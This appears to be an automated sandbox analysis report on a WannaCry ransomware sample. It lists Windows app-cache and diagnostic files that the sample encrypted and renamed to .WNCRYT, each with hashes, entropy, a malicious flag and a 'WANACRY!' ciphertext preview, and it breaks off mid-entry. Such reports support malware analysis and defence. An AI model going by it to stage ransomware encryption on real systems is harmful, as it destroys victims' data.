                                                  Preview:WANACRY!.....f...8..3.P.s.Gpq.1.|.....p.......tC...~I.... ...K.Q.}.9...`.+..#.L.>.7.~|h.X....! ...K........w..5[z....g.j.."..s2..O@h...Qq.......k..M%....(....(.J.WH....\......a.^.?8..92j....^..%..*...9.......?.E 4...G.Z@0..&.....XF.O.q]..S3....(O;<.)s.)....C.......1....2.z/=o)R...{....u...9...>9....2B.Q..U..E....F..M`L|..,.?.5.k2...}.=.sT.WGp.?.PNGP....I.#p|..c..>...m.'.}E..q...bv...%3....l..8.2.)x,....B=..K....#.1...;d.".._.d...$.........N*,..W.G...P.ME&[...y......d...TU....&w-i..6N.."....I..f%M..K.z..:#'..s.w..#....h.M.K.....r...H.I...&?6.X...\/...grk.....i..(!...Qt.t.%.....i;........0...e.oG.<3m..o(#.rbP..1..;.2.vE8...?&< :K...g.n..z..m1q,...P-.:..o.,f...^.).M.:...t..`.S..4..$!.YZ...9.n.O.4.r_og<.&.....bk.l..&...\.Rg>..+..z...#...A.!qg..EJg".%...M..q.I.t..a;.k........q."_....!V..=....G.:.. C...O.-....w..S.6

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_22_11_18_56_1666.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.7351772695625725
                                                  Encrypted:false
                                                  SSDEEP:24:bkVmOX3nG2mswLUdZ1seo5bGlqUDfcFIJcU9wI3vlE:bkNX3G2sLKFo+fL7pve
                                                  MD5:78DC9916A3F98ACE82B90EF9CC64CF09
                                                  SHA1:D3B7F196F21B5A976EBE73498DA87E0AD58EAEEB
                                                  SHA-256:F3A84F63C6B3ED32C4ADCF4CF9C1D216F13C95E20EE9A87DE206526C5CA2CFBC
                                                  SHA-512:181B1BE46920A2F8C21CC703AED688CC994FCA5ABFBF404636D773F3218F8E7EE2C9ECB1776ECAC6493FE0F2D9B4C1C8B5EBE86B970B37FB5D0153FE31B06CF1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........".~)-.4...]....s..[\:9..F../v ..o....uj.fS....X.V=d?.......C.o0..q...ff.C.;i.q~..b;...H!..../t@[9.E.Z.W..3sP.).fI.......j.I...0.~...Rx5G..h.Q...}...-,...3..N.t2..m.{.....R.X\p.\..y........E......8f.RA...Z.Yq..$.L...UO....H..h..+&vb...s...}F..N....C.......h..F...h.+....}...;...V.:E..M... .7)r........\8kp?.].4S.E`.......W........S......u5..k1g{.}......o0.].~.$*9],ad5.H.s....W-..,EMP.......:........'.)..1......T....&.~..3.z.Y..A....&.....?=..*........L.Ck..F...D&.g...../a...b..\M...,>:tJ.L.y.L.Gu.x8BE-.\...1.B...[K.,C]k...=B....kZ...a....Z....b..X...,.A.....t...c..e.YN8.......,/.i..U."..[vG.pk...]7...t.)UB..)..3.-.....fel..LI".s.l...D.D.PT.S.,#.%.M?.b.P...=..j\73.}}..D..M.c..u,..e..-=.s.^n.np....7....V.X.`....}./h.@;..]..,..vU.J5?....&.u..Of."$.....5gC...FFo.jp...z.A..HX...5.W...*....Tc."-S9....r.w.&.c..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask09_30_13_13_40_5442.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):872
                                                  Entropy (8bit):7.759052197574247
                                                  Encrypted:false
                                                  SSDEEP:12:bkE9ds5IEjD4iwTv6ot3+94Kfv7wRFay8jf7zKUDHuxB+Hc2Y2q3AheUO3HRW3Tu:bkYs4hv6w64QERohjf3HK2q3AQ03TLK
                                                  MD5:993EE72CC5B3A30FFA1DE78752CAA93A
                                                  SHA1:95CA0B2628EF8184244F39E2F7314EBB209553D2
                                                  SHA-256:8A7D14A565EEE0D24908D5C6FD1364EDFDC111349B66CA5DDAB3F15EACAFDF9E
                                                  SHA-512:4236E8FF2E0A3D979298CA487FF6EDAFE28238ED8AD830519FA3F06750A501F73CA318A83403269FD1F58563147B0D6ED6FAAF6A88172D57CEAD3F71CD69D180
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........*..z..sO..B.H..b.H...$....>s..uU.k...5.}...+....F.Z../S........5/.Q..w2..J.'.%......o..-^.s.....i.F^( .L0.XEV(.}%...d....../....<J.......6[zp..u.z|t.u.O.f....h.q29.N.....u0B............k...'G..C..#.8....J,.DT..zK....<.V...Xz......@QcK..MA.....C..........+N*..10...^....n..7.(.H.,.p...].l..,.&....,..b>..R.....-.k:.Ud....R......;....=........f%-.. )iw$.J...D....ju...!;X.h...\GQ.(JV{.;Z...l..$\.N....bjf.....9 .t..J...m..C.t.E.?.A..av..}..^..m.....W...o.u..p..,}.;..HTh\P....N....O.W.....[.....q..v.y=..\.=.....md..D,.3p.*..RW.r}CJ.8.@E.:m....[..g..$.w`.G.h.....$.s...z.|.......,..b.b..&.X.................Pu$?V~.../.q.R.~...f......,.2.R6.x..WI...j..}..?G.J..f.94..XP......g...|f..k>..q..*.S..o....A..y~.....*...:a...O.B...8.Y..%..._...J.eJK....C.g,.e..K....~k.H%.../...*...?~xl.B.2H..e@Z...G.[.o..Y.O....9A...*.OH.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_19_38_8611.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1880
                                                  Entropy (8bit):7.886700788705434
                                                  Encrypted:false
                                                  SSDEEP:48:bkFc249t6/RSf1rvULFimyQ5Tk5NcjANnD:oFc2/S5cLLOmjQ
                                                  MD5:E7849A91BD3084C39A8F48D0085FB57A
                                                  SHA1:DA86FC6A1AF1C3251285503A7ADAFD449F596529
                                                  SHA-256:59ED471E43B81DAF37EB37BC09A8CB549E47830594C8DBBA5EB4754162C6D905
                                                  SHA-512:617A546DC1CC69AB9C0AEC381FE492BE64B4F34422793871CBE94A5774B5D683D598EEFE5E8052C50EE63AC1A62FC4044BE70455248741F6C0B97D1DFDA75BF2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.... .......!.. ..9....a..F.\.`6.*s..3Pv....T.7.f..@.u>.I....\L>......F.;_=.l;.pC../.!..&..4.-....|..1.}..3...`U&Jb...^..1&G|W....p.......@o...1..usIN>~.u.."........4..Y.9..^^@....+.p.C.[.Qh%.F....g}dR.]f....i...K.,...;}.&...7.....m.J....5..C....5........:...p.g.z._s7('.r.......F...ws.#..}.Gt@zL...._...... .Br.j..7N..6.SC)..1.D....O.7.......Z_iQ.}............G).........B^N!.!.Wwb ....k.Ox$sw...;. .a....S.....]..v.mZ(.........b.75...-.g...!...`/.).p|.FTWB.c...#.!.cXw.>.9.`.%..(..N.!O.j.v..#.!.Sb.j<Wf....R.*S^.A...|.QL.#..+..K...!G..........C^..............-l...cG...%...A.{K.....=am* s..T2VRJ...p.=.....{1.......t....m...Z...`%z$k.....6zU..n.....}o.q.l7..a]B../.v..0.d.?#U#..z...!_...E.jr..O...m..*..S.[_ ..SO!...o.&....J...3h...toB.3..e.<m..S.....^w.,&$.#L>..2.}P.3m?...G.<....^.7.....>._]....<..&.J..`....0S.....4..*0;.y&=.".X...8..f.4.R..?.\b..t._......c..*6....(......c...Z.....uc;.$.h...Y..W.f....?..@").....@...........5=.L`#...w..YS.....

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_17_13_50_48_4321.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1944
                                                  Entropy (8bit):7.891575439369692
                                                  Encrypted:false
                                                  SSDEEP:48:bkXJZMwaoDEiwdIsc78W7QZBJG5fsL+TU214KCY6k0Df/iF:o5ZMhoDzwdIMW0Z+5fe+TUVY6PDf/iF
                                                  MD5:0F46681101C54D75F113A62A1CAB298C
                                                  SHA1:564E37A5D39E12B3B42EC414E4543B7DDC5C2B3A
                                                  SHA-256:AB4568B7AD70D7AD3EFD09BA72F306E767AAA3085C5F5F32FB8696123BDE1BA6
                                                  SHA-512:6D0431F68D31AFDB015C11F3181CFDB779DE9BE93B48B457CA62EA8FD5C574EBF3F08ED359317F1DD35D07250F327FF825CEA5367F3CA259432CDCB0E6115AFA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......^_...1}.:D...`..c..n.s...EU!<.....(.Ve.8...z..._..d2.=...."..U1..t.2.msv.e.6._>bR4.7.....Na....o.$...b..%#$6'Y....?)..T...g..\^.%..c\^..jp.wJ<oBX.Y..0D..Y8.....t..&T..e9.....#[d...;..a. ......?.xT..N.XU.x..^.C..Td...u..8)....n......$....Is......s.......2.t.7sq..<M......&Q....X+..........J1..:....W.A.....1.0Z#k.m..:>....S..u../.{....|.}..,..8v...7R.n..b.G}.G.).Db...L..VT.....I.M5....q......./g.D3 .v..a....i.oZn2.dA:~.e...o..|.7....6.}l.'<.5W.UZ...k>{..(.%......}.'D..3?.Qb..h......~L.*f.B........N...;....Q..>y.2..$.6O....6..#[b..x..CM.W..S..y..c ;..gt......]..].,W.Q...fq_....N7..L?q...Sc..g'-...J....C..e.-.X..#......YF...........,...m4...o...Hx_.z..........R......gU\.m.)&.....lZ.?.>........c. ...p.....H.\&.%..Uu....3.......AV.1...B....fw.a...R....`.UQ....]`.q ....?.....d...>6....[.J.....no}XE,7#.Il`..>...F..(......kg..q ....c...1..Um..Xb7......|X..O...:.4.......K...B$....n....J...m...^.b]+.s.s{#.t....^.b.i....D.~e.OC..]...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.PostInstallationTask08_18_17_07_25_4954.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1576
                                                  Entropy (8bit):7.872312578087441
                                                  Encrypted:false
                                                  SSDEEP:48:bk8+v1+DId81fv8MvylWxl4TZLfUg2Br0:o8+N+DI2v62l4ZLfLSA
                                                  MD5:6B4D8042C164571BBFF370D3230F3357
                                                  SHA1:0822464120215F94376C52E4EEFC9E8F7493F587
                                                  SHA-256:B8FF8B18CFE041002A058CCE5BC09DBCDE097F33FCE2BCFEAC221AE173AC8C14
                                                  SHA-512:28C7F05C1AB77D9F6C76D782A3FD28C2D4D425BD103D8807999BC70FAA2BD668B65401E6B8A1BFF5E8451FB1473FA32092E73734C0C6203BAA2BF6E1DD25F70B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....@.......w...p.E:X{...2.....)........=d@....m...2I...~..%...A.7F.bl:J$-.C........%....4.?#L.>......X..(..3..O..L.F5..... h.%w.....n...ZqJK./..; .AV.....P]..=.y....a...:....~O....!...[.e...T...]...vS%d. ...,.E..k.l..K..]7.......$..45.?............g..*...*="pyi.F.g..x>.N.m{....)..h..x.2U.V.q.T.*...6..[.YT.T3... .d 0n+......K.@...1.!....=.$U..].n..\Zw\=~..Z...IN.&.{...~.......8..b.p...50.=B..1.W.ZL)....2C>g<@s9X.-....0.....QI@...............l>.....c.`.>(,V...?........9...w.|....U..Q......E.....%l...K]..:..-.u`...5.......)$...d....`. .z..Cl2F..#.......,W(.%....V.,..........k8!..W..v.."...o.:...).a...b.g..7.K%P...U_..'.3......\Vs/..I...70.."u...^....0.cc.2/...LrC(..B..1..X.).%.../.9...#.92..z...xc.C.b......A...R.R..4.k...Lg..Y...R.x.vA8....V.......8.ncu.,...c...r..$7+..(xT.$=..9."B....r.r.d.....aX3G...T.%*k..F....I%.....#n...u....,Q..'&..R..*...... .........)....!;.f.o..A.S.._.C....1..:.$..Jn..U...@.....v'S...^......

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202120
                                                  Entropy (8bit):7.99910724453835
                                                  Encrypted:true
                                                  SSDEEP:6144:K98tySpDP4vqu8myL/ojO37hWfx0+j2F0N:IS/ojOFgWC2FO
                                                  MD5:2E3BA76735C3199373CFDA4742F986F6
                                                  SHA1:DAAB04FDC298EA37B2820BD41A4DC17C69FE2025
                                                  SHA-256:E600839EAFD95446C673A9AF8202B141E4014C866B56076C91E11FE8EFFD0E58
                                                  SHA-512:96486958F79270244356046717954F97A195DD492601BEBB5C74168CD445C35D551FAA3AD078D434E57B5381455724AC8FBAD07A39794FC271951BEB28FE74D6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....}.0t_CS..r.:...[....c.C..cw.m...Y.A....?...U.x.g.6...Rlv..0W......|&V.~?.5+O+.q3...&.....`P..J..4'.B.,{.$.'m....B.........Q.....9.....\....%..u..,M....t./0U....l.|I.L..%.+r.5...c.......h.6p\.....-j..^?.....1 ..-.(...y.1..^.TjC.X.r;/1,..`[..!....c.......J].........F'...........EP?2...-..z....q9...... ..-..K.n,i...,*.#..xj..gk.l1.G..?...:..z.Y0%...B.JD..9.... St.\y..._/...,..%..fL..<d..y...~zM..._.uL.n-:^ .Y.0..1....@VI.....z=..Ut*A..fH".....V.~....<..h...<.C'...@<..tD.(\".,.....3-ji.M?....8...........d.L..p..4-...B.E.v.E.D...t....../2......5.L..........V...v%BR.1.....v.........;..........D.#.q]:.-..?......wXBT.wrQ.8i.{..g.}.;,...i..jC......n#Ty....y.h.....?.......)H.W*.U.v2./4.....A...X...7..r....E.t...r..=.......m{Pw....$.ZV.gb$...c.."4..........b...n.t'..?....R..J....*...G.ee.>...$l8.a_..J9.F.B..?...wS..o....`.D.HAI,S....'..fo...F.B.'....u..Y....~.w.n.K.q.m...Vi.....C..N.B..R.W.Q$P?.z...d._...T.r..w.3>*.+...c.Z.......`.J.k-t...j."P..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):34536
                                                  Entropy (8bit):7.995221646879254
                                                  Encrypted:true
                                                  SSDEEP:384:L3okjUd03YY5z8jpn3Jitmhm4XPiokrzmgS2PfK/vks9b6icHYxIrPiRqiLZFBhD:LY6Jw3hNUdfBkbRxxKHiVlWs1i6rDj
                                                  MD5:C67F715F9D1BC5B175D3487235A3DD0B
                                                  SHA1:964E301602855A719226FE2C79AED421295CF216
                                                  SHA-256:E013243A00C21FA29AF9FE4DA33071676B16CB3539B5BE6D693B61DF61E5095D
                                                  SHA-512:739A315BCFA1F29951395B36CC4B841EF01771C31EC89F32045070F2656BC934C9E4D3E912D43083A49BF224A59B319697AC2602B937629679B580549A6430DD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....T.......H.O....<.H.9#...&u.....z.*...-.++..C.....Dl.k..p.B.<6.1......WB.....0.PV.<..x..1K..t....w~....T..;..U.$c.u."..VX*.8.v.,G...JhW...OD..5%..x`.\..v0......=....a3...I..*...g.......Yp.5S.u.c.3..<<..9k.l..i..#......2.....:U..h8...f..p.Q^....;.............@.n..n&/}......(........iK.N.|L-......K.. %~n.Y.f.M2.5/...Y./.t..S..[qT....`.....d.P.b,P...I.u.1k.....o...E..EQ..f...!.T[..._..O.f.V..G...!...C..H..$.n..o...U.....DD%..fF..s.}.p..>.#....C...d..`....N.#8..G>...>yW.....P<'.L..x.\.........B.....8........h.@.>AqG-.TiX..VdB.?;.].*,...g..R..H&.r.m..k3.)...p.*...........b.i..,....."........j].K.".1G.,-...I%....~.vQ.......}............."Yox.h..H.....S-.<V`..J...*....*.W"....B.1_E..3.D5.<K.5..e.y.J$.....`.^{".....7....r..R...7..q.j.h.g...O?.d.=1....._...46o..qV...I..h...Z.{.Xf......@..y.*&&...aK5.).Ob:.^b...R.=...D.m..8..Gk..w~N.J./!_...c......V.<y.}..Z.M...K`..%r.TC6.........G..-.......Q~..@(W....g.ZX.....T%.."sX..V.....[.......

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):227064
                                                  Entropy (8bit):7.999235571649068
                                                  Encrypted:true
                                                  SSDEEP:6144:8rb7KuFCGLz6rzurFgNTzswz4r5Bkz+mW:8eYz6rziByqmW
                                                  MD5:21C0018D17512CCDA55C61923999D566
                                                  SHA1:A8FADECD851441B56BB047EED4FC5487BBAA3734
                                                  SHA-256:9F431941955583AFF21E88B014839C66C0D998C3C6BA5870304A9B0128807E3D
                                                  SHA-512:BCACDD402EA51BF963482229CAA54B1FB6B89E8E4D40A2B891BC22366BC5AB1B5B2ED9B73602624E33FE4FCEE622AEA0445288CD16F587F93E29D135A51E6CFF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...... M..Y...J......'.i.7..d.......n...m...+..l0.z.....v+.3..X....q~.q.h..Ne..!.i3||!...A.@.=..c4..^^.Q.^..m/EF.....y.".,N.1d..).s..Q...)B..NwBmW/.Lm.4... .D..?.B.~.~.cD.X.c.}.R.n.X.;....9......I.i.{..!..u@-..}..#%.4.g.ubU...-ZGVv..h.Z.<5\...V...........u.........k...."pj=.8..h..V..!j.r..Y.*...5.J/P+...~..ty+....Z&.B,......:..cv..,b....".i9>...:.k. j.....#u5.&.!=#.W%:a..h.q.6...@.#~...ep.A.M).....U.....1g..`$p.E....2"i.b.g.~.P1.p"....A.t...6r.w~u......F.S.f5j..0K..$......1.L....]..(...C$..A..=,.....@\c<..|....r.,.<O...C._.Y.......&%lc..|.O..roB.\...k..J.LS.B...=L.`./N.;q.........sY~.g"....o............CL~.'Y..Sv`..H.$..')..b.U..}....M.z..."._4.VV.g.?\....C..c..$\.. }...N....X7..ht.R3}3..L...{~...j..p.W.]..P...qD....Z.X.4.....+..d.cz......e..i....5...~.v&.._...&.U:....Z..v;D.... ....I.$.e.j.0..=..............:dT....SMv.T....*...sM...e.......v...-%.I._].#K...........O...^..S|?oh2.Sk...x.@@.D..>..d.d(......Ui.s.-.E..p..<&T/.ZL+..(..+$w._&9

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):53752
                                                  Entropy (8bit):7.996588520050917
                                                  Encrypted:true
                                                  SSDEEP:768:FBsO/NUEuIaalBjeTrhe2HU259EFY/wRe/imTSAGkNrN3YhxZ9jlWpd9pHEFdyXQ://p7lBCTK4StH0SAGYrNIp9spd9pkFPL
                                                  MD5:FCEF6D4029230BCAA72305DCAB62192D
                                                  SHA1:743319AB25CD8048B4A969F464889CC6FB28DFFB
                                                  SHA-256:E6F9C82243DD147B97B4CCFD99C02FAA7C483478222B0245EDC0F28783A3750D
                                                  SHA-512:86A353144F484ADE0FBA6C7A7071EC58B16B0189AEF6E72EF75B2B8D0A1229240BF20EAB934751A5D8AB3C0DBC3688DED17B0F34797E719046866475A5F74F0C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....SM.QY..C4..,.. {.].?..=F......iCGH..+..7.G...-:./q*G..m....~..@._B..').....?g..UBX...C0>*...3..De..^..K,...~+.5f%_( :.......T.Cca}x......`vO)....x....UH.....y...#......5_......3\!.i'.\....@..# ....B...%.D*.44.O...Hjf....H...:eY.|..SRx.p................./.........l...6...t .l"Q.H.=....'r..H'.86I...1@R..k$B.V..2.x.........[.. Ca..FPW....9...[..L0.}......Y...?7.g........q..ZCV......-.t...2.......J....3.@w....=...7.gQ.^.Mb*|a...JE....v.J.P9..O....j.......m....~IR....T<?..6..7..!q..Z..mOj...~....4..y...aU.f...X..i.j8.3....3.....?..8....Y.j;....B....I..OF.i>....p..J...v...%...:(..,X].m|t..Y.oH...9I...b....i..S&~V..x...`..BW.....{.........!.J.~a+..~.Pj.....N..F.4D5.^.M.U.}.[vK..rT.@=...1.w.....vbg..[=....XD.\GJ.t..I>"..f8dV.r#1...H.pN......*..\....f..+.v.n.6...;..:..>......{&<..1O.K}+.*..n..U........G#.^.....e....MU.$.,c..Xd..}.oxE.$.nu...,."9..B'..,............Nb.@.=..U..D..4.....6.. ..@(3.*...).S...W...A!......./;+........v.`.]=..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_14[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8008
                                                  Entropy (8bit):7.979806667248807
                                                  Encrypted:false
                                                  SSDEEP:192:HLy65yYh1+8m+igp+W+r06OkylI7UU+HqjoV/iQl9qZwTFTgyU:H98wmrYTc9mfq2TgyU
                                                  MD5:9A4A3BB493750D9D0C62825929BF5190
                                                  SHA1:BF9F8C84C8F0991D143DB756C979A155554B05B5
                                                  SHA-256:1B7BAD8DBF19EB3B44D6915DFF1A7CC07531A96AB75A1C9CCDA6104B5E11CEE3
                                                  SHA-512:694B893BC5B49F89C7F114A1AF02D3D68908570D42DAE9B4CC83996AE860E1A60C5FB9215F99D8AEFCA6212213ED962200007C6F0EBDEAB75C2F8C36299A7152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......,c..z...V......(..!.A|.F..q..F).i.p$.*..N..t.YC...|..i........Vu...L.A..S..R.......F...lC.....^..].,.u.(".n.?...=......J....-9....V....6o#.\.6X..>.5.me.+.<..o".....Ch,I3.l{V9-.sGH.8.r..@.QSgq.v*...w`".....=.......@.-.G..Yy"&...B..d..U...>....................L..1...Q......=.I.......r.......m.u..Z.I.eC..V.#..n..)$....|S.d.!.\.C.mL*m..b....#k)...S.{.......E.....M...Nthzz...M.;..:z...,uJ...crGI .|..*..^N.[T.....0...{..T#..M...H'........*[L.!.(F..O..#..u..M.....u.(.,.b...#.`....X...].<%'...|..v..h.q..q=..H-...e$Z...8..0...3o..(..|..~.3.r..|.Q.,...dG7....Z....{QPn.f...k....j%O.N......t..C.{..9.+..2u..c{!.8-.v...6..Y...J.j...F:.kz.".Ih..N......h.m..q..&.\.MI....P:...(.gL.....P....$..}...x..1"K.`G.l.~...V..m)E. ..A.1~<$.8QV.46....P.`.E.D.6.;\....ts&...-.F..J.).b..!...J....&..T..g.....Oy..|.9@.r.7r..X|.K/9...]/1.e.....!.I.>:X.W@58."..I...*..q.... ..c.Vt#`5L.{=...Z..!..(.~..XS.K.D...z.I.h/.,b.%.....m..f.Q.fvx....VX..^L.\%}...nu.jh...#.u....XIC

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):123256
                                                  Entropy (8bit):7.998652798814184
                                                  Encrypted:true
                                                  SSDEEP:3072:E/bK7la2qY2b7jz02i/TaGN36XWKLkj3fWAOA6HvuMh39tk:ETK7c224bsXWhzO9AovFttk
                                                  MD5:9B3003B94AA23EA2A7B940DFC0358BE6
                                                  SHA1:FFEADC1E5E9413566BCBB851970C8004E934E14C
                                                  SHA-256:B1AEA0A9FB655C86EA1F48222D5B9822A8441BFE3595F34F86F4C3D60B4A2040
                                                  SHA-512:E7DC4398C4C15065CCB2790EC245B7E867B2AC0A276370A851B1D9F20C73F8DF06CCAB0626AE8F4282D6EFEA7360F616E6E2E7D0A77C0ABB6A4D51EA3BD5220C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......6.Yi....7c.X..W.u.*_..Dk.......M.....i.<.Ag.nt"dY...6P+.......%.P.HD.......0.......f....w....c...F...sO.-.G.`F....i\7.Ajr..K..S..M..I....y..N.,..".+.(.....[..Ch.%`?.#).......M..r.<C*..g.....V%{......-.`\..G4.4....`..4n........D..f.....bQ.....Z.........`.=.P.....?P.d'.|.X.z...;.pi~t...<`......nv..$.......~'J.B.C...L4.3@...{|B|Xk.....v....Ke+,r....m.n].r...y.R..oZA.{..,f.~........ .y.R..........{..v/.F.... ISL..3..V..t~6'....0.AL....0.........."..,.`....Ywo..Q.S9rM......!...2...Z.<.a.7.....=..W.U,m....x..E.8.PRj....&M9S..I'7....8R...c:A.'..@.N..b....i..(.N9..H].....M(}..&.C..2eE...g@@&..,......k#`\~.q..`#N...[G{...A...z..."b...'n.lk.[Y....b.q.:?I..@.8...q(.=5...5...k.....;./3...g.[... V.@.....E..Zf.-.+...M....$V..hg..a..|.dj.2dK...^..+4o.N....8.t.H.5....A..M.._.= .........7.."*[xi.t?J...uM.p..]4.r...Y.22.F....Yg.R..q.!..c=.L[.k...<.....!......?......{}..+......Y.dg.......{.m...D.r...@.pN.VNv...".(R.S...Ep..../May..k.503.,Ft..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):95112
                                                  Entropy (8bit):7.998129436564507
                                                  Encrypted:true
                                                  SSDEEP:1536:e/nz2LmkExqw5mM9NkROjVE/Ymu97SV+TfsUlia7D5Banqa94xAkyTd+6Fak9Tbl:RgmSNbq/Ymu97SV+bsUTdk55Td+Gp9fl
                                                  MD5:BC3649C955BCD5E7508965F9ED6D6403
                                                  SHA1:78AAA6363690D35DFDFA33CC14500DE03BCF3BE5
                                                  SHA-256:386DB7ACC4489020A8C74ADD0418FECCE722909F99FA2C88ADE26B70723043A7
                                                  SHA-512:45A4470756F51442A543F21F81E65F295668E350CF94C309BE91B7EF321FBF414E6AEE529DAB8F1A7150E9659124785517AEBD9463A06A2E4E36B9F220578F3D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....R,.C.X.w;...WVeH..z..@.p..v.\k.`.JR.L..U8......./....ks|.?BA....#Jo.w.vF....R?,..M;.B...c.].zC.....m...H.c[iW.0br.....l....q.....A.5.G....G.. ..G....!..7..&.C.r..I.{..A.Y.D...)_...3+a:..Uh....NrV...|.}f.\C4.(.L{.o..ga,..V..O%..jn....a..Q'.Q....gr............`D.D7.1..xN- .N....B].(A].vG...$^...e..&%...yz......A+ .\.H....g8.....BmQ~......,...Kj.BSO...K...%....Q..{".n...~._C`#..W...g.(Rz8.....a..q8.r.)..D...b.7..x.h...../....Y.aC.....zp....WDct.......;...!...Ty.VVJ...?QU....6..h..=.~,.j..8.&....3xG........J.i)..........Q4W..h*g:.rq .n.kX1...pl..D....X..s>..K...8..Mb....Y.v.k.=i..{}."...D.b...+i........v^.3...i.?..U.......-.....nS.O..L.@`..6I|..Qy!`;.....d..<...I...jH.A.R>...j.......>".G..}.#..q..b.yj....N.@../:.M)D......%.N.I_.w..l.....d...........E......q..6Z...EP:>....c.%q.b...h.....n.MU5.....'x...Z.4v.7W..........d.k.Y.....il.~xQ......Q...GB.S^F.W.*...m.gx..xfn..>......:(3$p.&.j.."..p.Z.....P.M3.J.......*)@...8.Z9P8....p...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_17[1].txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6872
                                                  Entropy (8bit):7.973874521868196
                                                  Encrypted:false
                                                  SSDEEP:192:gsE0nUGTkO88z+9QPw3cPQyaIRvh60U9tRm/re+:BnUGAP8zXh4kC9tRm/1
                                                  MD5:F0FBA1A68AC4F8487C796E56D07B1C7C
                                                  SHA1:505A1F375C1DDF80DB853B10953E2BCDE1ADF038
